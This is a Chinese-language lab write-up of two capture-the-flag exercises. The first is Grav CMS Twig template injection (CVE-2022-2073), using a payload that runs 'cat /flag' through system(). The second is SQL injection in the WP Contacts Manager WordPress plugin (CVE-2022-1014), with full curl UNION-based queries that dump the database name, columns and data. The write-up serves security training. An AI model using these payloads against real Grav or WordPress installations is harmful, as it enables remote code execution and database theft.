【春秋云境】CVE-2022-2073靶场WP
网站地址:https://yunjing.ichunqiu.com/
渗透测试
1.已知提示
- Grav CMS 可以通过 Twig 来进行页面的渲染,使用了不安全的配置可以达到远程代码执行的效果,影响最新版 v1.7.34 以下的版本
2.开启靶场
3.创建用户
-
在打开的靶场页面注册一个账户,填写完信息之后点击
Create User
即可
4.执行代码
-
点击Pages–>Home,输入代码,点击
Save
{{['cat\x20/flag']|filter('system')}}
5.获得flag
- 访问首页获得flag
【春秋云境】CVE-2022-1014靶场WP
网站地址:https://yunjing.ichunqiu.com/
渗透测试
1.已知提示
- wordpress插件 WP Contacts Manager <= 2.2.4 对用户输入的转义不够充分,导致了SQL注入。
2.开启靶场
3.漏洞存在位置
- 漏洞路径
/wp-admin/admin-ajax.php?action=WP_Contacts_Manager_call&type=get-contact
4.sql注入
-
查看数据库版本
curl 'http://eci-2ze173nkohbajx7g2j3c.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php?action=WP_Contacts_Manager_call&type=get-contact' \ --data '{"id":"1\u0027 UNION ALL SELECT 1,(SELECT version()),3,4,5,6,7,8,9,0,1,2; -- "}'
数据库版本为
10.5.15-MariaDB-0+deb11u1
-
爆库
curl 'http://eci-2ze173nkohbajx7g2j3c.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php?action=WP_Contacts_Manager_call&type=get-contact' \ --data '{"id":"1\u0027 UNION ALL SELECT 1,(SELECT database()),3,4,5,6,7,8,9,0,1,2; -- "}'
数据库名
ctf
-
爆表
http://eci-2ze173nkohbajx7g2j3c.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php?action=WP_Contacts_Manager_call&type=get-contact
发现一个名为
flag
的表 -
爆字段
curl 'http://eci-2ze173nkohbajx7g2j3c.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php?action=WP_Contacts_Manager_call&type=get-contact' \ --data '{"id":"1\u0027 UNION ALL SELECT 1,(SELECT group_concat(column_name) from information_schema.columns where table_name=0x666c6167),3,4,5,6,7,8,9,0,1,2; -- "}'
发现字段名为flag
-
爆数据
curl 'http://eci-2ze173nkohbajx7g2j3c.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php?action=WP_Contacts_Manager_call&type=get-contact' \ --data '{"id":"1\u0027 UNION ALL SELECT 1,(SELECT group_concat(flag) from flag),3,4,5,6,7,8,9,0,1,2; -- "}'
获得flag